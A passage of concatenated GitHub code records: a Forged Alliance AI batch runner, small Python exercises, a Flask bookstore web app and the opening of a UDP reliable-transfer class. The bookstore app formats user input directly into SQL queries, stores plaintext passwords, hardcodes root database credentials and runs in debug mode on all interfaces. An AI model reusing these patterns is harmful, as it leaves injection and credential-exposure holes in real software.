run_experiment,\n faf_dir,\n ais=experiment.ais,\n map_name=experiment.map,\n max_time=args.max_game_time,\n log_dir=log_dir,\n use_affinity=args.use_affinity\n )\n futures.append(fut)\n\n if not args.obnoxious:\n for w in gw.getWindowsWithTitle(\"Forged Alliance\"):\n if not w.isMinimized:\n w.minimize()\n\n time.sleep(10)\n\n if args.delete_logs:\n for path in log_dir.iterdir():\n if path.is_file() and path.suffix == \".sclog\":\n path.unlink()\n\n results = [fut.result(0) for fut in futures]\n if args.save_results:\n with open(\"results.json\",\"a\") as f:\n for res in results:\n f.write(json.dumps(res))\n f.write(\"\\n\")\n else:\n for result in results:\n print(json.dumps(result))\n print(time.time()-start)\n\n\ndef run_experiment(\n faf_dir,\n ais,\n map_name,\n max_time,\n log_dir,\n use_affinity,\n 
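The Affinity class above pins each game process to a dedicated core through psutil. A minimal sketch of the underlying call, assuming psutil is installed and the platform supports it (Linux/Windows; macOS does not expose cpu_affinity):

```python
# Minimal sketch of the CPU pinning the Affinity class above performs,
# assuming psutil is installed and cpu_affinity is supported.
import psutil

proc = psutil.Process()          # no pid argument -> the current process
original = proc.cpu_affinity()   # cores the process may currently run on
proc.cpu_affinity([0])           # pin to core 0, as Affinity.start() does per pid
assert proc.cpu_affinity() == [0]
proc.cpu_affinity(original)      # restore, mirroring Affinity.end()
```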
init_name=\"init_autorun.lua\"\n):\n bin = faf_dir / \"bin\"\n\n log_id = \"\".join(random.choice(string.hexdigits) for _ in range(8))\n log_name = log_dir / (\"log_\" + log_id)\n log_file = log_name.with_suffix(\".sclog\")\n\n args = [\n bin / \"ForgedAlliance.exe\",\n \"/nobugreport\",\n \"/nosound\",\n \"/exitongameover\",\n \"/init\", bin / init_name,\n \"/map\", map_name,\n \"/log\", log_name,\n \"/maxtime\", str(max_time),\n \"/aitest\", ai_test_arg(ais)\n ]\n log.debug(\"%s\", args)\n proc = subprocess.Popen(args)\n pid = proc.pid\n if use_affinity:\n AFFINITY.start(pid)\n proc.wait()\n if use_affinity:\n AFFINITY.end(pid)\n return get_results(log_file, ais, map_name)\n\n\ndef ai_test_arg(ais):\n return \",\".join(\n \"{}:{}:{}:{}\".format(\n ai.slot,\n ai.name,\n factions[ai.faction.lower()],\n ai.team\n ) for ai in ais\n )\n\n\ndef get_results(log_file,ais,map_name):\n game_results = defaultdict(list)\n winners = []\n profiling = []\n with open(log_file) as f:\n for line in f:\n if \"AutoRunEndResult|\" in line:\n _, army_index, result = line.strip().split(\"|\")\n army_index = int(army_index)\n game_results[army_index].append(result)\n if \"victory\" in result:\n winners.append(army_index)\n elif \"AutoRunProfileLog|\" in line:\n profiling.append(line.strip().split(\"|\",1)[1])\n\n return {\"map\": map_name, \"ais\": ais, \"winners\": winners, \"results\": game_results, \"profiling\": profiling}\n","repo_name":"HardlySoftly/FAF-AI-Autorun","sub_path":"_autorun/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22236937492","text":"def contarAbecedario(palabra):\r\n\r\n letra = palabra[0]\r\n letra = letra.lower() #Transformo la letra en minuscula\r\n\r\n number = ord(letra) - 96 # Resto 96 para transformarlo su valor en ASCII a decimal. 
Las letras en minusculas comienzan con valor 96 en decimal ASCII, por ende -96.\r\n return \"El orden numerico de la letra es: \" + str(number)\r\n\r\npalabra = raw_input(\"Palabra a escribir: \")\r\n\r\nprint(contarAbecedario(palabra))\r\n","repo_name":"EloyHerta/HE_TIC","sub_path":"Ejercicios/Huerta_Ej15.py","file_name":"Huerta_Ej15.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31629373708","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\n\nn,k,*data = map(int,read().split())\nit = iter(data)\nab = [[a,b] for a,b in zip(it,it)]\nab.sort()\nnow = k\nidx = 0\nwhile idx < n:\n if ab[idx][0] <= now:\n now += ab[idx][1]\n idx += 1\n else:\n break\nprint(now)","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc203/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17781329095","text":"from flask import Flask, render_template, request, session, flash, abort, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import desc\nfrom sqlalchemy.sql import func\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine, text\nfrom flask_table import Table, Col\nimport os\nimport decimal\nimport time\n\nengine = create_engine('mysql+mysqlconnector://root:canossa88@localhost:3306/bookstore', echo=True)\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:canossa88@localhost:3306/bookstore'\n\ndb = SQLAlchemy(app)\n\n##########################################################################################\n# Table Constructors #\n##########################################################################################\n\nclass customers(db.Model):\n login_name = db.Column(db.String(20), primary_key = True)\n password = db.Column(db.String(20))\n first_name = db.Column(db.String(20))\n last_name = db.Column(db.String(20))\n credit_card = db.Column(db.String(20))\n address = db.Column(db.String(50))\n phone_number = db.Column(db.String(20))\n\n def __init__(self, login_name, password, first_name, last_name, credit_card, address, phone_number):\n self.login_name = login_name\n self.password = password\n self.first_name = first_name\n self.last_name = last_name\n self.credit_card = credit_card\n self.address = address\n self.phone_number = phone_number\n\nclass OrderTable(Table):\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n orderid = Col('order id')\n order_date = Col('order date')\n order_status = Col('order status')\n order_qty = Col('quantity')\n\nclass FeedbackTable(Table):\n html_attrs = {\"classes\":\"table\", \"id\": \"FeedbackTable\", \"border\": True}\n classes = ['table']\n login_name = Col('username')\n title = Col('book title')\n isbn13 = Col('ISBN13')\n score = Col('score')\n short_text = Col('comment')\n feedback_date = Col('date')\n avg_rating = Col('rating')\n\nclass 
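The ord()-based alphabet index above relies on ASCII codes: lowercase 'a' is 97, so subtracting 96 yields a 1-based position. A quick check of that mapping:

```python
# Lowercase ASCII starts at 97 ('a'), so ord(ch) - 96 maps 'a'..'z' to 1..26.
assert ord('a') - 96 == 1
assert ord('z') - 96 == 26
print(ord('C'.lower()) - 96)   # 3
```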
RatingTable(Table):\n html_attrs = {\"classes\":\"table\", \"id\": \"RateTable\", \"border\": True}\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n login_name = Col('customer name')\n rating = Col('rating')\n\n\nclass RateTable(Table):\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n customer_rating = Col('customer name')\n rating = Col('rating')\n\nclass BrowseTable(Table):\n #classes = [\"Banana\"]\n html_attrs = {\"classes\":\"table\", \"id\": \"BrowseTable\", \"border\": True}\n isbn13 = Col('ISBN13')\n title = Col('title')\n authors = Col('authors')\n publisher = Col('publisher')\n year_of_publication = Col('year_of_publication')\n inventory_qty = Col('inventory_qty')\n price = Col('price')\n bookformat = Col('format')\n keywords = Col('keywords')\n subject = Col('subject')\n avgscore = Col('avgscore')\n\nclass RecTable(Table):\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n\nclass StatTable(Table):\n classes = ['table']\n title = Col('book title')\n authors = Col('authors')\n publisher = Col('publisher')\n\nclass StatTableEntry(object):\n def __init__(self, title, authors, publisher):\n self.title = title\n self.authors = authors\n self.publisher = publisher\n\n#Make table classes\n\n##########################################################################################\n# Flask App Routes #\n##########################################################################################\n\n'''\nQuestion 1: Login statements\nUser can login\nAdd admin login (implement book registration with manager later)\n'''\n\n@app.route('/')\ndef index():\n if not session.get('logged_in'):\n return redirect('login')\n else:\n username = session['login_name']\n if username != 'manager':\n return render_template('index.html')\n return render_template('indexm.html')\n\n@app.route('/registration/', methods=['GET'])\ndef registration():\n return render_template('registration.html', regerror='')\n\n@app.route('/registration/', methods=['POST'])\ndef registration_post():\n if request.form['my-form'] == 'register':\n first_name = request.form['first_name'].strip()\n last_name = request.form['last_name'].strip()\n login_name = request.form['username'].strip()\n password = request.form['password'].strip()\n address = request.form['address'].strip()\n credit_card = request.form['ccno'].strip()\n phone_number = request.form['phone'].strip()\n newcustomer = customers(login_name, password, first_name, last_name, credit_card, address, phone_number)\n try:\n db.session.add(newcustomer)\n db.session.commit()\n session['logged_in'] = True\n session['login_name'] = login_name\n return redirect('/')\n except IntegrityError:\n return render_template('registration.html', regerror='Error: Duplicate username found, please try another username.')\n elif request.form['my-form'] == 'back':\n return redirect('/')\n\n\n@app.route('/login/', methods=['GET'])\ndef login():\n return render_template('login.html', loginerror='')\n\n@app.route('/login/', methods=['POST'])\ndef do_admin_login():\n POST_USERNAME = str(request.form['login_name'].strip())\n POST_PASSWORD = str(request.form['password'].strip())\n\n Session = sessionmaker(bind=engine)\n s = Session()\n query = s.query(customers).filter(customers.login_name.in_([POST_USERNAME]), customers.password.in_([POST_PASSWORD]) )\n result = query.first()\n if result:\n flash(\"successfully logged in\")\n session['logged_in'] = True\n session['login_name'] = POST_USERNAME\n else:\n return 
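registration_post above detects duplicate usernames by letting the primary-key constraint raise IntegrityError instead of SELECTing first. A self-contained sketch of that pattern; in-memory SQLite stands in for the app's MySQL database:

```python
# Sketch of the duplicate-username pattern used by registration_post:
# insert and let the primary key raise IntegrityError.
from sqlalchemy import create_engine, text
from sqlalchemy.exc import IntegrityError

eng = create_engine("sqlite://")
with eng.connect() as conn:
    conn.execute(text("create table customers (login_name text primary key)"))
    conn.execute(text("insert into customers values ('alice')"))
    try:
        conn.execute(text("insert into customers values ('alice')"))
    except IntegrityError:
        print("duplicate username")  # the route renders this as a form error
```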
render_template('login.html', loginerror='''Error: Wrong username or password.''')\n return redirect('/')\n\n@app.route('/logout')\ndef logout():\n session['logged_in'] = False\n session['login_name'] = None\n return redirect(\"/\")\n\n'''\nQuestion 3: Added profile data\nGetting data and presenting it in tables for the profile page\n'''\n@app.route('/getrecord/', methods=['GET'])\ndef getrecord():\n if not session.get('logged_in'):\n return redirect('/login')\n username = ''\n if 'login_name' in session:\n Login_name=session['login_name']\n username = Login_name\n rs = []\n qresult = db.engine.execute(\"select * from Customers where login_name='%s'\"%username)\n for row in qresult:\n rs.append(row)\n info1 = rs[0]\n\n rs = []\n qresult = db.engine.execute(\"select b.title, o.isbn13, ob.orderid, ob.order_date, ob.order_status, o.order_qty from ordered_books ob, orders o, books b where ob.customer = '{}' and ob.orderid = o.orderid and b.isbn13 = o.isbn13;\".format(username))\n for row in qresult:\n rs.append(row)\n orderlist = rs\n ordertable = OrderTable(orderlist)\n\n rs = []\n qresult = db.engine.execute(\"select t1.login_name, t1.title, t1.isbn13, t1.score, t1.short_text, t1.feedback_date, t2.avg_rating from (select fb.login_name, b.title, fb.isbn13, fb.score, fb.short_text, fb.feedback_date from Feedback fb, Books b where fb.login_name = '{}' and b.isbn13 = fb.isbn13) as t1 left outer join (select avg(rating) as avg_rating, isbn13 from rate where login_name = '{}' group by isbn13) as t2 on t1.isbn13 = t2.isbn13;\".format(username, username))\n for row in qresult:\n rs.append(row)\n feedbacklist = rs\n feedbacktable = FeedbackTable(feedbacklist)\n\n rs = []\n qresult = db.engine.execute(\"select b.title, r.isbn13, r.login_name, r.rating from Books b, Rate r where (r.customer_rating = '{}' and b.isbn13 = r.isbn13);\".format(username))\n for row in qresult:\n rs.append(row)\n ratelist = rs\n ratetable = RatingTable(ratelist)\n\n if username == 'manager':\n return render_template('userrecord.html', username=info1[0], password=info1[1], first_name=info1[2], last_name=info1[3], credit_card=info1[4], address=info1[5], phone_number=info1[6], ordertable=ordertable.__html__(), feedbacktable=feedbacktable.__html__(), ratetable=ratetable.__html__(), manager='Manager')\n return render_template('userrecord.html', username=info1[0], password=info1[1], first_name=info1[2], last_name=info1[3], credit_card=info1[4], address=info1[5], phone_number=info1[6], ordertable=ordertable.__html__(), feedbacktable=feedbacktable.__html__(), ratetable=ratetable.__html__(), manager='')\n\n\n'''\nQuestion 8: Added browse method to look up books\n'''\n@app.route('/browse/', methods=['GET'])\ndef browse():\n if not session.get('logged_in'):\n return redirect('/login')\n Login_name=session['login_name']\n username = Login_name\n if username == 'manager':\n return render_template('browse.html', manager='Manager')\n return render_template('browse.html', manager='')\n\n@app.route('/browse/', methods=['POST'])\ndef browse_post():\n Login_name=session['login_name']\n username = Login_name\n manager = ''\n if username == 'manager':\n manager = 'Manager'\n\n if request.form['my-form'] == 'search':\n authorForm = request.form['author']\n publisherForm = request.form['publisher']\n titleForm = request.form['title']\n subjectForm = request.form['subject']\n allquery = request.form['basicsearch']\n wherequery = \" where\"\n if authorForm:\n wherequery += \" bo.authors = '{}' and\".format(authorForm)\n if publisherForm:\n wherequery 
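The raw queries in getrecord and browse_post splice user input into SQL with % and .format(), which is injectable. A sketch of the bound-parameter alternative using the text() construct this file already imports; in-memory SQLite stands in for the real database:

```python
# Bound parameters delegate escaping to the driver instead of
# string-splicing user input into the SQL.
from sqlalchemy import create_engine, text

eng = create_engine("sqlite://")
with eng.connect() as conn:
    conn.execute(text("create table customers (login_name text, password text)"))
    conn.execute(text("insert into customers values ('alice', 'pw')"))
    row = conn.execute(
        text("select * from customers where login_name = :name"),
        {"name": "alice"},   # bound parameter, never string-spliced
    ).first()
    print(row)               # ('alice', 'pw')
```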
+= \" bo.publisher = '{}' and\".format(publisherForm)\n if titleForm:\n wherequery += \" bo.title = '{}' and\".format(titleForm)\n if subjectForm:\n wherequery += \" bo.subject = '{}'\".format(subjectForm)\n if allquery:\n wherequery += \" (bo.authors = '{}' or bo.publisher = '{}' or bo.title = '{}' or bo.subject = '{}')\".format(allquery, allquery, allquery, allquery)\n if wherequery == \" where\":\n wherequery = \"\"\n if wherequery[-3:] ==\"and\":\n wherequery = wherequery[:-3]\n\n optionForm = request.form['options']\n\n # sort by year, descending order\n if optionForm == 'year':\n sort_order = 'year_of_publication'\n # sort by score, descending order\n elif optionForm == 'score':\n sort_order = 'avgscore'\n\n sqlquery = \"select b.isbn13, b.title, b.authors, b.publisher, b.year_of_publication, b.inventory_qty, b.price, b.format as bookformat, b.keywords, b.subject, c.avgscore from (select bo.isbn13, bo.title, bo.authors, bo.publisher, bo.year_of_publication, bo.inventory_qty, bo.price, bo.format, bo.keywords, bo.subject from Books bo{}) as b left outer join (select avg(score) as avgscore, isbn13 from feedback group by isbn13) as c on b.isbn13 = c.isbn13 order by {} desc;\".format(wherequery, sort_order)\n\n print(sqlquery)\n\n booklist = []\n qresult = db.engine.execute(sqlquery)\n for row in qresult:\n booklist.append(row)\n\n booktable = BrowseTable(booklist)\n return render_template('bookpage.html', booktable='

Browse Results
        '+booktable.__html__(), manager=manager)\n\n ''' Question 6 '''\n\n if request.form['my-form'] == 'Feedback':\n isbn13Form = request.form['feedback_isbn13']\n scoreForm = request.form['score']\n commentForm = request.form['comment']\n date = time.strftime(\"%Y-%m-%d\")\n login_name=session['login_name']\n try:\n db.engine.execute(\"insert into feedback (isbn13, login_name, score, short_text, feedback_date) values ('{}','{}','{}','{}','{}')\".format(isbn13Form,login_name,scoreForm,commentForm,date))\n success = \"Your feedback for this book has been recorded successfully\"\n except IntegrityError:\n return render_template('bookpage.html', booktable='You have already rated this book before or you specified an invalid ISBN13', manager=manager)\n except Exception:\n return render_template('bookpage.html', booktable='Something went wrong, please try again', manager=manager)\n return render_template('bookpage.html', booktable=success, manager=manager)\n\n ''' Question 9 '''\n\n if request.form['my-form'] == 'Get Top Feedback':\n isbn13Form = request.form['topfeedback_isbn13']\n limitForm = request.form['topfeedback']\n login_name=session['login_name']\n feedbackList = []\n qresult = db.engine.execute(\"select t1.login_name, t1.title, t1.isbn13, t1.score, t1.short_text as short_text, t1.feedback_date, t2.avg_rating from (select fb.login_name, b.title, fb.isbn13, fb.score, fb.short_text, fb.feedback_date from Feedback fb, Books b where fb.isbn13 = '{}' and b.isbn13 = fb.isbn13) as t1 left outer join (select login_name, isbn13, avg(rating) as avg_rating from Rate where isbn13 = '978-1501138003' group by login_name, isbn13) as t2 on t1.login_name = t2.login_name order by t2.avg_rating desc limit {};\".format(isbn13Form, limitForm))\n for row in qresult:\n feedbackList.append(row)\n feedbacktable = FeedbackTable(feedbackList)\n return render_template('bookpage.html', booktable='

Top '+limitForm+' Feedback for the book
        '+feedbacktable.__html__(), manager=manager)\n\n ''' Question 7 '''\n\n if request.form['my-form'] == 'Rate':\n login_nameForm = request.form['login_name']\n isbn13Form = str(request.form['rate_isbn13'])\n rateForm = int(request.form['rating'])\n login_name=session['login_name']\n if login_nameForm == login_name:\n return render_template('bookpage.html', booktable='ERROR: You are not allowed to rate your own feedback')\n try:\n db.engine.execute(\"insert into rate (login_name, isbn13, customer_rating, rating) values ('{}','{}','{}','{}')\".format(login_nameForm, isbn13Form, login_name, rateForm))\n success = '''Your rating for ''' + login_nameForm + \"'s feedback for this book has been recorded successfully\"\n except IntegrityError:\n return render_template('bookpage.html', booktable='ERROR: You have already rated this feedback before or you specified an invalid input')\n except Exception:\n return render_template('bookpage.html', booktable='Something went wrong, please try again')\n return render_template('bookpage.html', booktable=success)\n\n return render_template('bookpage.html', booktable=booktable.__html__(), manager=manager)\n\n'''Question 2'''\n@app.route('/browse/order', methods=['POST'])\ndef order_post():\n Session = sessionmaker(bind=engine)\n s = Session()\n recolist = []\n index = 0\n manager = ''\n try:\n orderid = 1\n for a in db.engine.execute(\"select orderid+1 from orders order by orderid desc limit 1;\"):\n orderid = a[0]\n except:\n orderid = 1\n status = 'arrived'\n date = time.strftime(\"%Y-%m-%d\")\n customer = ''\n isbn13str = request.form['isbn13']\n isbn13list = isbn13str.split(',')\n copiesstr = request.form['copies']\n copieslist = copiesstr.split(',')\n\n for k in copieslist:\n if int(k) <= 0 or k == '':\n return render_template('bookpage.html', booktable='Invalid quantities for order, please try again.', manager=manager)\n\n for j in isbn13list:\n if j == '':\n return render_template('bookpage.html', booktable='Wrong format of entries for order, please try again.', manager=manager)\n toorder = db.engine.execute(\"select * from books where isbn13 = '{}';\".format(j))\n if toorder == None:\n return render_template('bookpage.html', booktable='One or more ISBN13 you entered is/are not valid, please try again.', manager=manager)\n\n if len(isbn13list) != len(copieslist):\n return render_template('bookpage.html', booktable='Wrong format of entries for order, please try again.', manager=manager)\n\n if 'login_name' in session:\n Login_name=session['login_name']\n customer = Login_name\n if customer == 'manager':\n manager = 'Manager'\n\n for i in range(len(isbn13list)):\n for j in range(i + 1, len(isbn13list)):\n try:\n if isbn13list[i] == isbn13list[j]:\n isbn13list.pop(j)\n copieslist[i] = str(int(copieslist[i]) + int(copieslist[j]))\n copieslist.pop(j)\n except:\n print ('finished compressing lists for duplicates')\n\n newob = []\n newo = []\n\n while index < len(isbn13list):\n try:\n isbn13 = isbn13list[index]\n copies = int(copieslist[index])\n for rs in db.engine.execute(\"select inventory_qty from Books where isbn13 = '{}'\".format(isbn13)): #Select the current inventory\n book_curr_qty = rs[0]\n tempqty = int(book_curr_qty) - copies\n if tempqty < 0:\n return render_template('bookpage.html', booktable='Sorry, one or more books you ordered is/are out of stock or you have ordered more than the available quantity.', manager=manager)\n #db.engine.execute(\"update books set inventory_qty = {} where isbn13 = '{}'\".format(tempqty, isbn13))\n 
db.engine.execute(\"insert into Ordered_books (orderid, customer, order_date, order_status) values ('{}','{}',DATE '{}','{}');\".format(orderid, customer, date, status))\n db.engine.execute(\"insert into Orders values ('{}','{}','{}');\".format(orderid, isbn13, copies))\n recom = db.engine.execute(\"select title, isbn13 from books where isbn13 in (select isbn13 from orders where isbn13 <> '{}' AND orderid in (select orderid from ordered_books where customer in (select customer from ordered_books where orderid in (select orderid from orders where isbn13 = '{}'))) group by isbn13 order by sum(order_qty) desc);\".format(isbn13,isbn13))\n for rc in recom:\n if rc not in recolist:\n recolist.append(rc)\n index += 1\n orderid += 1\n except Exception:\n return render_template('bookpage.html', booktable='Something went wrong, please check your order again.', manager=manager)\n reco = RecTable(recolist)\n return render_template('recommendation.html', recommendation=reco.__html__(), manager=manager)\n\n'''Manager Options'''\n@app.route('/manager/', methods=['GET'])\ndef manager():\n username = session['login_name']\n if username != 'manager':\n return redirect(url_for('index'))\n return render_template('manager.html', record='', add='')\n\n'''Question 4: Manager adds new book to database'''\n@app.route('/manager/recordnew/', methods=['GET'])\ndef recordnew():\n username = session['login_name']\n if username != 'manager':\n return redirect(url_for('index'))\n return render_template('recordnew.html', recerror='')\n\n@app.route('/manager/recordnew/', methods=['POST'])\ndef recordnew_post():\n title = request.form['title']\n isbn13 = request.form['isbn13']\n authors = request.form['authors']\n publisher = request.form['publisher']\n year_of_publication = request.form['year']\n inventory_qty = request.form['copies']\n price = request.form['price']\n book_format = request.form['format']\n keywords = request.form['keywords']\n subject = request.form['subject']\n try:\n db.engine.execute(\"insert into books values ('{}','{}','{}','{}','{}','{}','{}','{}','{}','{}');\".format(isbn13, title, authors, publisher, year_of_publication, inventory_qty, price, book_format, keywords, subject))\n return render_template('manager.html', record='Successfully recorded new book.', add='')\n except IntegrityError:\n return render_template('recordnew.html', recerror='Duplicate ISBN13, please check the book details again.')\n\n'''Question 5: Increment book count feature'''\n@app.route('/manager/addcopy/', methods=['GET'])\ndef addcopy():\n username = session['login_name']\n if username != 'manager':\n return redirect(url_for('index'))\n return render_template('addcopy.html')\n\n@app.route('/manager/addcopy/', methods=['POST'])\ndef addcopy_post():\n try:\n isbn13 = request.form['isbn13']\n copies = request.form['copies']\n db.engine.execute(\"update books set inventory_qty = inventory_qty + {} where isbn13 = '{}';\".format(copies, isbn13))\n return render_template('manager.html', record='', add='Successfully added copies to book.')\n except:\n return render_template('manager.html', record='', add='The book for the ISBN13 doesn\\'t exist, please check your entries again.')\n\n\n\n@app.route('/manager/statistics', methods=['POST'])\ndef statistics():\n date = time.strftime(\"%Y-%m-%d\")\n\n m = int(request.form['top'])\n if m>5000:\n return render_template('manager.html', record='', add='m value is too large, please try a smaller value!')\n month = request.form['month']\n year = request.form['year']\n titlelist = []\n 
authorlist = []\n publisherlist = []\n statslist = []\n\n db.engine.execute(\"create table temp_table select ISBN13 , sum(order_qty) as total_qty from orders where orderid in (select orderid from ordered_books where year(order_date) = '%s' and month(order_date) = '%s') group by ISBN13 order by total_qty desc limit %s\" % (year, month, m))\n\n titlestat = db.engine.execute(\"select title from books join temp_table on books.ISBN13 = temp_table.ISBN13;\")\n for ts in titlestat:\n titlelist.append(ts.title)\n\n authorstat = db.engine.execute(\"select authors from books join temp_table on books.ISBN13 = temp_table.ISBN13;\")\n for ast in authorstat:\n authorlist.append(ast.authors)\n\n publisherstat = db.engine.execute(\"select publisher from books join temp_table on books.ISBN13 = temp_table.ISBN13;\")\n for ps in publisherstat:\n publisherlist.append(ps.publisher)\n\n for i in range(0,m):\n try:\n arg1 = titlelist[i]\n except IndexError:\n arg1 = ''\n try:\n arg2 = authorlist[i]\n except IndexError:\n arg2 = ''\n try:\n arg3 = publisherlist[i]\n except IndexError:\n arg3 = ''\n statslist.append(StatTableEntry(arg1, arg2, arg3))\n\n stats = StatTable(statslist)\n db.engine.execute(\"drop table temp_table\")\n\n return render_template('statistics.html', stats=stats.__html__())\n\n##########################################################################################\n# Running the application #\n##########################################################################################\n\nif __name__ == '__main__':\n app.secret_key = os.urandom(12)\n app.run(debug=True, host='0.0.0.0')","repo_name":"architdate/OnlineBookStore","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":23282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40143839681","text":"import socket\nimport ipaddress\nimport random\nimport threading\nimport time\nfrom datetime import datetime\n\nfrom P3.example.python.packet import Packet\n\n\nclass PacketType:\n ACK = 0\n SYN = 1\n SYN_ACK = 2\n\n\nclass ConnectionState:\n ESTABLISHED = 1\n CLOSED = 0\n\n\nclass MyPacket:\n MIN_LEN = 15\n MAX_LEN = 1024\n\n def __init__(self, packet_type, seq_num, peer_ip_addr, peer_port, ack_num, payload: bytes):\n \"\"\"\n Wrap the Packet class, add ack_num into the packet\n :param packet_type:\n :param seq_num:\n :param peer_ip_addr:\n :param peer_port:\n :param ack_num:\n :param payload: should be bytes\n \"\"\"\n self.packet_type = int(packet_type)\n self.seq_num = int(seq_num)\n self.peer_ip_addr = peer_ip_addr\n self.peer_port = int(peer_port)\n self.ack_num = int(ack_num)\n self.payload = payload\n\n payload_to_router = self.ack_num.to_bytes(4, byteorder='big') + payload\n self.packet_to_router = Packet(packet_type=self.packet_type,\n seq_num=self.seq_num,\n peer_ip_addr=self.peer_ip_addr,\n peer_port=self.peer_port,\n payload=payload_to_router)\n\n def to_bytes(self):\n \"\"\"\n to_raw returns a bytearray representation of the packet in big-endian order.\n :return:\n \"\"\"\n return self.packet_to_router.to_bytes()\n\n def __repr__(self, *args, **kwargs):\n return \"#%d, #%d, peer=%s:%s, size=%d\" % \\\n (self.seq_num, self.ack_num, self.peer_ip_addr, self.peer_port, len(self.payload))\n\n @staticmethod\n def from_bytes(raw):\n \"\"\"\n From raw bytes creates a MyPacket instance\n :param raw:\n :return:\n \"\"\"\n if len(raw) < MyPacket.MIN_LEN:\n raise ValueError(\"Packet is too short: {} bytes\".format(len(raw)))\n if len(raw) > 
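MyPacket above serializes header fields with int.to_bytes in big-endian order. A round-trip check of that framing for a 4-byte ack number (demo value):

```python
# Round-trip of the big-endian framing MyPacket uses for header fields
# such as the 4-byte ack_num.
ack_num = 1025
raw = ack_num.to_bytes(4, byteorder="big")
assert raw == b"\x00\x00\x04\x01"
assert int.from_bytes(raw, byteorder="big") == ack_num
```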
MyPacket.MAX_LEN:\n raise ValueError(\"Packet is exceeded max length: {} bytes\".format(len(raw)))\n\n curr = [0, 0]\n\n def nbytes(n):\n curr[0], curr[1] = curr[1], curr[1] + n\n return raw[curr[0]: curr[1]]\n\n packet_type = int.from_bytes(nbytes(1), byteorder='big')\n seq_num = int.from_bytes(nbytes(4), byteorder='big')\n peer_addr = ipaddress.ip_address(nbytes(4))\n peer_port = int.from_bytes(nbytes(2), byteorder='big')\n ack_num = int.from_bytes(nbytes(4), byteorder='big')\n payload = raw[curr[1]:]\n\n return MyPacket(packet_type=packet_type,\n seq_num=seq_num,\n peer_ip_addr=peer_addr,\n peer_port=peer_port,\n ack_num=ack_num,\n payload=payload)\n\n\nclass ReliableDT:\n def __init__(self, router_addr):\n self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.router_addr = router_addr\n\n self.max_chunk_len = 2\n self.is_sending = False\n\n # for sender side\n self.peer_addr_of_sender = None\n\n self.timeout = 2\n\n self.wsz = 8 # sliding window size\n self.send_buffer = None # sender buffer[wsz], allocate in runtime\n self.timers = None # timers[wsz], timer for each packet in sliding window\n self.acks = None # acks[wsz], received acks in sliding window\n self.send_base = None\n\n self._ack_number = None # used to store last ack number sent by sender in 3-way handshake\n self._seq_number = None # used to store last seq number sent by sender in 3-way handshake\n\n # for receiver side\n self.peer_addr_of_receiver = None\n self.recv_buffer = None\n self.recv_base = None\n self.bytearray_to_be_delivered = None # data can already be delivered\n self.recv_resources_allocated = False\n\n\n def bind(self, addr):\n self.conn.bind(addr)\n\n def connect(self, addr):\n \"\"\"\n Sender side three-way handshake connection to addr\n :param addr: destination address\n :return:\n \"\"\"\n # send SYN message with seq=client_isn\n # client_isn = random.randint(0, 999)\n client_isn = 99\n syn_packet = MyPacket(packet_type=PacketType.SYN,\n seq_num=client_isn,\n peer_ip_addr=addr[0],\n peer_port=addr[1],\n ack_num=0,\n payload=\"\".encode(\"utf-8\"))\n\n while True:\n try:\n self.conn.sendto(syn_packet.to_bytes(), self.router_addr)\n\n self.conn.settimeout(self.timeout)\n\n # after sending SYN, waiting fro SYN_ACK response\n print(\"In connect(), waiting for a SYN_ACK response\")\n response, sender = self.conn.recvfrom(1024)\n response_packet = MyPacket.from_bytes(response)\n if response_packet.packet_type != PacketType.SYN_ACK:\n continue\n if response_packet.ack_num != client_isn + 1:\n continue\n\n server_isn = response_packet.seq_num\n break\n\n except socket.timeout:\n # if timeout occurs, resend SYN\n continue\n\n # received response correctly, send ACK\n ack_packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=client_isn + 1,\n peer_ip_addr=addr[0],\n peer_port=addr[1],\n ack_num=server_isn + 1,\n payload=\"\".encode(\"utf-8\"))\n\n self.conn.sendto(ack_packet.to_bytes(), self.router_addr)\n # self._ack_number = server_isn + 1\n # self._seq_number = client_isn + 1\n\n self.peer_addr_of_sender = addr\n print(\"Sender state -> ESTABLISHED\")\n self.send_base = client_isn + 1\n self.recv_base = server_isn + 1\n\n # todo: if received duplicate SYN_ACK, meaning last ACK was lost, resend the last ACK\n # todo: corrected, no need to resend, the following data packet will have ACK anyway\n\n def accept(self):\n data, sender = None, None\n while True:\n try:\n data, sender = self.conn.recvfrom(1024)\n if sender or data:\n break\n except socket.timeout:\n continue\n\n p = 
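connect() above loops send, recvfrom, and resend on socket.timeout. The timeout mechanism in isolation, on an ephemeral UDP socket that nothing writes to:

```python
# recvfrom on a quiet UDP socket raises socket.timeout after settimeout,
# which is what drives the retransmission loops above.
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))   # ephemeral port; nothing will arrive
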